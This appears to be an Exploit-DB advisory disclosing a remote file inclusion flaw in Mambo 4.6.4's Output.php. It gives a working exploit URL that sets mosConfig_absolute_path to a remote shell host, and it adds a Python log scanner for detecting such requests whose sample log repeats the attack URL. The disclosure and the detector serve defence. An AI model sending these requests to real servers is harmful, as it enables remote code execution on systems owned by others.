exploitdb | irk4z | EDB-ID:5808
Jun 13, 2008 - 12:00 a.m.

Mambo 4.6.4 - 'Output.php' Remote File Inclusion

2008-06-13 00:00:00
irk4z
www.exploit-db.com

AI Score: 7.4 High (Confidence: Low)
EPSS: 0 Low (Percentile: 0.0%)

.-----------------------------------------------------------------------------.
|  vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability                  |
|  download: http://mambo-foundation.org/                                     |
|                                                                             |
|  author: [email protected]                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: all friends  ;)                                                   |
'-----------------------------------------------------------------------------'

# code:

 /includes/Cache/Lite/Output.php :
 1     <?php
 2
 3     /**
 4     * This class extends Cache_Lite and uses output buffering to get the data to cache.
 5     *
 6     * There are some examples in the 'docs/examples' file
 7     * Technical choices are described in the 'docs/technical' file
 8     *
 9     * @package Cache_Lite
10     * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11     * @author Fabien MARTY <[email protected]>
12     */
13
14     require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
   ...
   
^ no comment.. RFI in line 14: $mosConfig_absolute_path is used in require_once() but is never set in this file.

# exploit:

 http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?

# milw0rm.com [2008-06-13]
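
# detection (added example, not part of the original advisory):

A log check for the request pattern shown above, written for this page and not taken from the advisory or from Mambo. It goes slightly beyond the single URL by flagging any mosConfig_* variable supplied in a query string; the combined log format, the sample lines, the function names and the host example.invalid are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Values that start with a URL scheme or a PHP stream wrapper.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?|php|data)(?:://|:)', re.IGNORECASE)
# Mambo configuration variables share this prefix; none belongs in a URL.
# Matched case-insensitively so that sloppy probes are flagged as well.
CONFIG_PARAM_RE = re.compile(r'^mosConfig_\w+$', re.IGNORECASE)


def classify(log_line):
    """Return 'rfi', 'config-override' or None for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith('.php'):
        return None
    verdict = None
    # parse_qsl percent-decodes names and values once, as PHP does.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if not CONFIG_PARAM_RE.match(name):
            continue
        if REMOTE_RE.match(value):
            return 'rfi'              # config variable set to a remote URL
        verdict = 'config-override'   # config variable set from the request
    return verdict


def scan(log_text):
    """Return [(line_number, verdict)] for every flagged line."""
    pairs = ((n, classify(l)) for n, l in enumerate(log_text.splitlines(), 1))
    return [(n, v) for n, v in pairs if v]


# Constructed sample log (documentation addresses, placeholder host).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Jun/2008:10:01:02 +0000] "GET /mambo/index.php?option=com_content&id=3 HTTP/1.1" 200 5120
192.0.2.44 - - [13/Jun/2008:10:01:09 +0000] "GET /mambo/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://example.invalid/x? HTTP/1.1" 200 312
192.0.2.44 - - [13/Jun/2008:10:01:15 +0000] "GET /mambo/includes/Cache/Lite/Output.php?mosConfig_absolute_path=hTTp%3A%2F%2Fexample.invalid%2Fx%3F HTTP/1.0" 200 312
192.0.2.51 - - [13/Jun/2008:10:02:40 +0000] "GET /mambo/index.php?mosConfig_live_site=x HTTP/1.1" 200 5120
192.0.2.60 - - [13/Jun/2008:10:03:00 +0000] "GET /mambo/index.php?return=http://example.invalid/ HTTP/1.1" 200 5120
"""

if __name__ == '__main__':
    for lineno, verdict in scan(SAMPLE_LOG):
        print(lineno, verdict)
```

A 'config-override' hit means the request tried to set a configuration variable without a remote value; it is worth reviewing even when no include follows.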
